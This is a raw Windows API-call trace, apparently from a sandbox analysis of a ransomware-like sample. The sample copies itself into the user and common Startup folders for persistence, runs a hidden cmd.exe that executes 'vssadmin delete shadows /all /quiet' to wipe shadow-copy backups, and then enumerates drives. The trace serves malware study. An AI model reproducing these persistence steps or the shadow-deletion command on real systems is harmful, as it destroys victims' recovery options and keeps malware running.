	[0030.844] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df26d0, Size=0x100) returned 0x7df26d0
	[0030.844] lstrlenW (lpString="") returned 0
	[0030.844] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.844] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8c) returned 0x7df27d8
	[0030.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f8d8 | out: phkResult=0x18f8d8*=0xe4) returned 0x0
	[0030.844] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18f8e4, lpData=0x7e26770, lpcbData=0x18f910*=0x7fff | out: lpType=0x18f8e4*=0x0, lpData=0x7e26770*=0x53, lpcbData=0x18f910*=0x7fff) returned 0x2
	[0030.844] RegCloseKey (hKey=0xe4) returned 0x0
	[0030.844] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df27d8 | out: hHeap=0x7d60000) returned 1
	[0030.844] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.844] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8c) returned 0x7df27d8
	[0030.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f8d8 | out: phkResult=0x18f8d8*=0xe8) returned 0x0
	[0030.844] RegQueryValueExW (in: hKey=0xe8, lpValueName="Startup", lpReserved=0x0, lpType=0x18f8e4, lpData=0x7e26770, lpcbData=0x18f910*=0x7fff | out: lpType=0x18f8e4*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18f910*=0x98) returned 0x0
	[0030.844] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.845] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df27d8 | out: hHeap=0x7d60000) returned 1
	[0030.845] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75
	[0030.845] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.845] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df26d0 | out: hHeap=0x7d60000) returned 1
	[0030.845] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", lpDst=0x7e16768, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe") returned 0x6a
	[0030.845] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e26770 | out: hHeap=0x7d60000) returned 1
	[0030.845] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e16768 | out: hHeap=0x7d60000) returned 1
	[0030.845] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0x9260020
	[0030.845] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.845] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcfcd0
	[0030.845] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.845] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf938
	[0030.845] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0030.845] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0030.845] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0030.845] lstrlenW (lpString="kernel32.dll") returned 12
	[0030.845] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.845] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0030.845] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8
	[0030.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec
	[0030.849] ReadFile (in: hFile=0xe8, lpBuffer=0x9260020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesRead=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0030.861] WriteFile (in: hFile=0xec, lpBuffer=0x9260020*, nNumberOfBytesToWrite=0x3e600, lpNumberOfBytesWritten=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesWritten=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0030.866] ReadFile (in: hFile=0xe8, lpBuffer=0x9260020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesRead=0x18f958*=0x0, lpOverlapped=0x0) returned 1
	[0030.866] CloseHandle (hObject=0xec) returned 1
	[0030.868] CloseHandle (hObject=0xe8) returned 1
	[0030.868] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.868] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf938
	[0030.868] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.868] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcfcd0
	[0030.869] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0030.869] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0030.869] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0030.869] lstrlenW (lpString="kernel32.dll") returned 12
	[0030.869] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.869] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0030.869] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.869] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x9260020 | out: hHeap=0x7d60000) returned 1
	[0030.874] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e16768
	[0030.874] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e26770
	[0030.874] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.874] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf938
	[0030.874] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf938, Size=0x40) returned 0x7dcff00
	[0030.874] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff00, Size=0x80) returned 0x7df26d0
	[0030.874] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df26d0, Size=0x100) returned 0x7df26d0
	[0030.874] lstrlenW (lpString="") returned 0
	[0030.874] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.874] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8c) returned 0x7df27d8
	[0030.874] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f8d8 | out: phkResult=0x18f8d8*=0xe8) returned 0x0
	[0030.874] RegQueryValueExW (in: hKey=0xe8, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18f8e4, lpData=0x7e26770, lpcbData=0x18f910*=0x7fff | out: lpType=0x18f8e4*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18f910*=0x78) returned 0x0
	[0030.874] RegCloseKey (hKey=0xe8) returned 0x0
	[0030.874] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df27d8 | out: hHeap=0x7d60000) returned 1
	[0030.874] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59
	[0030.875] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.875] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df26d0 | out: hHeap=0x7d60000) returned 1
	[0030.875] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", lpDst=0x7e16768, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe") returned 0x4b
	[0030.875] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e26770 | out: hHeap=0x7d60000) returned 1
	[0030.875] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e16768 | out: hHeap=0x7d60000) returned 1
	[0030.875] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0x9260020
	[0030.875] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.875] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf938
	[0030.875] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.875] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcfcd0
	[0030.875] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0030.875] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0030.875] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0030.875] lstrlenW (lpString="kernel32.dll") returned 12
	[0030.875] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.875] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0030.875] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8
	[0030.875] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec
	[0030.878] ReadFile (in: hFile=0xe8, lpBuffer=0x9260020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesRead=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0030.890] WriteFile (in: hFile=0xec, lpBuffer=0x9260020*, nNumberOfBytesToWrite=0x3e600, lpNumberOfBytesWritten=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesWritten=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0030.895] ReadFile (in: hFile=0xe8, lpBuffer=0x9260020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x9260020*, lpNumberOfBytesRead=0x18f958*=0x0, lpOverlapped=0x0) returned 1
	[0030.895] CloseHandle (hObject=0xec) returned 1
	[0030.897] CloseHandle (hObject=0xe8) returned 1
	[0030.897] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.897] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcfcd0
	[0030.897] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.897] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf938
	[0030.897] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0030.897] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0030.897] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0030.898] lstrlenW (lpString="kernel32.dll") returned 12
	[0030.898] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf938 | out: hHeap=0x7d60000) returned 1
	[0030.898] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0030.898] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfcd0 | out: hHeap=0x7d60000) returned 1
	[0030.898] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x9260020 | out: hHeap=0x7d60000) returned 1
	[0030.902] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df6758 | out: hHeap=0x7d60000) returned 1
	[0030.903] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e06760 | out: hHeap=0x7d60000) returned 1
	[0030.903] lstrlenW (lpString="%windir%\\System32") returned 17
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfde0 | out: hHeap=0x7d60000) returned 1
	[0030.904] lstrlenW (lpString="%appdata%") returned 9
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf988 | out: hHeap=0x7d60000) returned 1
	[0030.904] lstrlenW (lpString="%sh(Startup)%") returned 13
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf960 | out: hHeap=0x7d60000) returned 1
	[0030.904] lstrlenW (lpString="%sh(Common Startup)%") returned 20
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcfd98 | out: hHeap=0x7d60000) returned 1
	[0030.904] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf960
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf960, Size=0x40) returned 0x7dcfd98
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfd98, Size=0x80) returned 0x7df26d0
	[0030.904] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf960
	[0030.904] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x1fffc) returned 0x7df6758
	[0030.904] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e16760
	[0030.904] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0x7e26768
	[0030.904] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ec8
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ec8, Size=0x20) returned 0x7dcf988
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf988, Size=0x40) returned 0x7dcfd98
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcfd98, Size=0x80) returned 0x7df2758
	[0030.904] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2758, Size=0x100) returned 0x7df2758
	[0030.904] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2758 | out: hHeap=0x7d60000) returned 1
	[0030.904] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x7e16760, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e26768 | out: hHeap=0x7d60000) returned 1
	[0030.904] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e16760 | out: hHeap=0x7d60000) returned 1
	[0030.904] CreatePipe (in: hReadPipe=0x18f918, hWritePipe=0x18f91c, lpPipeAttributes=0x18f908, nSize=0x0 | out: hReadPipe=0x18f918*=0xec, hWritePipe=0x18f91c*=0xf0) returned 1
	[0030.905] CreatePipe (in: hReadPipe=0x18f988, hWritePipe=0x18f98c, lpPipeAttributes=0x18f908, nSize=0x0 | out: hReadPipe=0x18f988*=0xf4, hWritePipe=0x18f98c*=0xf8) returned 1
	[0030.905] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1
	[0030.905] SetHandleInformation (hObject=0xf4, dwMask=0x1, dwFlags=0x0) returned 1
	[0030.905] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f928*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xec, hStdOutput=0xf8, hStdError=0xf8), lpProcessInformation=0x18f978 | out: lpCommandLine=0x0, lpProcessInformation=0x18f978*(hProcess=0x100, hThread=0xfc, dwProcessId=0x948, dwThreadId=0x94c)) returned 1
	[0030.923] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65
	[0030.923] WriteFile (in: hFile=0xf0, lpBuffer=0x7df26d0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18f924, lpOverlapped=0x0 | out: lpBuffer=0x7df26d0*, lpNumberOfBytesWritten=0x18f924*=0x41, lpOverlapped=0x0) returned 1
	[0030.923] CloseHandle (hObject=0x100) returned 1
	[0030.923] CloseHandle (hObject=0xfc) returned 1
	[0030.923] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df6758 | out: hHeap=0x7d60000) returned 1
	[0030.923] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65
	[0030.923] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df26d0 | out: hHeap=0x7d60000) returned 1
	[0030.923] lstrlenW (lpString="%comspec%") returned 9
	[0030.923] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7dcf960 | out: hHeap=0x7d60000) returned 1
	[0030.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc
	[0030.924] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0ec8
	[0030.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x7df0ec8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100
	[0030.925] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf388
	[0030.925] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x7dcf388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x108
	[0030.925] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ee0
	[0030.925] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ee0, Size=0x20) returned 0x7dcf960
	[0030.925] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf960, Size=0x40) returned 0x7dcfd98
	[0030.925] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26
	[0030.925] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xd0) returned 0x7df44c8
	[0030.925] GetLogicalDrives () returned 0x4
	[0030.925] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10014) returned 0x7df6758
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ee0
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df0ee0, Size=0x20) returned 0x7dcf960
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf960, Size=0x40) returned 0x7dcff48
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcff48, Size=0x80) returned 0x7df26d0
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df26d0, Size=0x100) returned 0x7df45a0
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df45a0, Size=0x200) returned 0x7df45a0
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df45a0, Size=0x400) returned 0x7df4ae0
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4ae0, Size=0x800) returned 0x7df4ae0
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df4ae0, Size=0x1000) returned 0x7e06778
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0x7e07780
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7df0ee0
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0fb8
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf398
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df0fd0
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x4) returned 0x7dcf340
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df0fe8
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf340, Size=0x8) returned 0x7dcf340
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df1000
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf340, Size=0x10) returned 0x7dcf340
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df1018
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df1030
	[0030.926] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7dcf340, Size=0x20) returned 0x7df1680
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df1048
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7df16a8
	[0030.926] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df1060
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df1078
	[0030.927] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df1680, Size=0x40) returned 0x7df2858
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df1090
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df10a8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df10c0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xe) returned 0x7df10d8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df10f0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df1108
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf340
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df1120
	[0030.927] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7df2858, Size=0x80) returned 0x7df26d0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4af8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4b10
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4b28
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4b40
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4b58
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df4b70
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4b88
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x8) returned 0x7dcf350
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4ba0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4bb8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df4bd0
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4be8
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df4c00
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xa) returned 0x7df4c18
	[0030.927] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xc) returned 0x7df4c30
